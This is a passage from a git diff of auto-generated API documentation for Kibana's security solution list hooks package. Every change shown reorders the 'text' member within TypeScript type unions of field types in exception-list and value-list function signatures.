string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_delete_list/index.ts", "deprecated": false, @@ -445,7 +445,7 @@ "OptionalSignalArgs", "<", "FindListsParams", - ">], { cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ">], { cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_find_lists/index.ts", "deprecated": false, @@ -467,7 +467,7 @@ "OptionalSignalArgs", "<", "ImportListParams", - ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_import_list/index.ts", "deprecated": false, @@ -623,7 +623,7 @@ "label": "addExceptionListItem", "description": [], "signature": [ - "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, @@ -646,7 +646,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false @@ -664,7 +664,7 @@ "label": "updateExceptionListItem", "description": [], "signature": [ - "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + "(arg: { listItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }; }) => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, @@ -687,7 +687,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false @@ -771,7 +771,7 @@ "signature": [ "(arg: ", "ApiCallMemoProps", - " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }) => Promise" + " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }) => Promise" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, @@ -785,7 +785,7 @@ "description": [], "signature": [ "ApiCallMemoProps", - " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }" + " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, @@ -954,7 +954,7 @@ "label": "ReturnExceptionListAndItems", "description": [], "signature": [ - "[boolean, { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[], ", + "[boolean, { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[], ", "Pagination", ", Func | null]" ], @@ -996,7 +996,7 @@ "label": "ReturnPersistExceptionItem", "description": [], "signature": [ - "[PersistReturnExceptionItem, React.Dispatch<({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | 